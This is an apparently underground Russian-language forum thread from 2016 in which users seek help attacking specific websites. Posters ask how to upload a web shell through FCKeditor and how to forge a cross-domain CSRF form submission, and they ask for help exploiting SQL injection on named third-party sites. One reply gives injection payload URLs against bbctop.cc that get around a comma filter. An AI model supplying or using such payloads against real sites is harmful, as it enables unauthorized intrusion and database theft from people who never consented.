Ваши вопросы по уязвимостям.

23.01.2016, 18:41

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

С нами: 9721141

Репутация: 1013

Цитата:

Сообщение от RWD

↑
Привет, вообщем нашел fckeditor. как через него залить шелл? может кто сталкивался?

https://www.google.ru/search?q=fckeditor+заливка+шелла

𝕏 Twitter Reddit Telegram Копировать ссылку

24.01.2016, 15:12

jangle

Познающий

Регистрация: 19.11.2006

Сообщений: 32

С нами: 10249722

Репутация: 5

Привет. Помогите раскрутить SQL:

Код:

https://www.sbxchanger.com/feedback.php?p=ok&page=/

24.01.2016, 20:03

RWD

Участник форума

Регистрация: 25.04.2013

Сообщений: 153

С нами: 6868406

Репутация: 2

Цитата:

Сообщение от jangle

↑
Привет. Помогите раскрутить SQL:

Код:

https://www.sbxchanger.com/feedback.php?p=ok&page=/

не крутиться вроде бы

24.01.2016, 20:34

sergei_petrovish

Познающий

Регистрация: 24.01.2016

Сообщений: 31

С нами: 5422646

Репутация: 1

Здраствуйте, не могу отправить пост форму ajax c сообщением. Проверка на CSRF , сообщение без перезагрузки страницы

Никаких скрытых параметров не передается, может есть какая то особенность в этих форм ?

Код формы

Код HTML:

Отправить сообщение

Мой код формы автоматической отправки с другого домена

Код HTML:

document.getElementsByTagName('form')[0].submit();

25.01.2016, 15:29

Sensoft

Постоянный

Регистрация: 14.06.2015

Сообщений: 396

С нами: 5745206

Репутация: 1

http://www.bbctop.cc/index.php?act=respons.respons&cid=%27

Как подключится ?

пытался havil1.6 и дампером

не катит

25.01.2016, 15:58

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

С нами: 9176038

Репутация: 8

Цитата:

Сообщение от Sensoft

↑
http://www.bbctop.cc/index.php?act=respons.respons&cid=%27
Как подключится ?
пытался havil1.6 и дампером
не катит

Фильтрация на запятые.

Код:

http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1,2)=(1,2)+order+by+10+--+

http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1)=(1)+order+by+10+--+

Используйте конструкции join

25.01.2016, 16:34

Sensoft

Постоянный

Регистрация: 14.06.2015

Сообщений: 396

С нами: 5745206

Репутация: 1

Цитата:

Сообщение от BigBear

↑
Фильтрация на запятые.

Код:

http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1,2)=(1,2)+order+by+10+--+

http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1)=(1)+order+by+10+--+

Используйте конструкции join

Чёт не фига не получается

25.01.2016, 17:37

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

С нами: 9176038

Репутация: 8

Цитата:

Сообщение от Sensoft

↑
Чёт не фига не получается

А что вы попробовали?

Покажите запрос.

25.01.2016, 17:48

Sensoft

Постоянный

Регистрация: 14.06.2015

Сообщений: 396

С нами: 5745206

Репутация: 1

Цитата:

Сообщение от BigBear

↑
А что вы попробовали?
Покажите запрос.

Ты не понял, я не очень шарю в языке php и sql

#10

25.01.2016, 21:38

ArmusIAm

Познающий

Регистрация: 08.01.2016

Сообщений: 33

С нами: 5445686

Репутация: 0

Цитата:

Сообщение от BigBear

↑
Фильтрация на запятые.

Код:

http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1,2)=(1,2)+order+by+10+--+
http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1)=(1)+order+by+10+--+

Используйте конструкции join

Если не сложно, расскажи более подробно. Очень интересно но сути не уловил.

В принципе, запрос итак проходит (к тому же на первом запросе, запятые по прежнему остаются в запросе?):

Код:

http://www.bbctop.cc/index.php?act=respons.respons&cid=27+order+by+10--

Проблема начинается в http://www.bbctop.cc/index.php?act=r...5,6,7,8,9,10--

Можешь показать на этом примере? Спасибо!

Создать сделку

Мои сделки

Сделка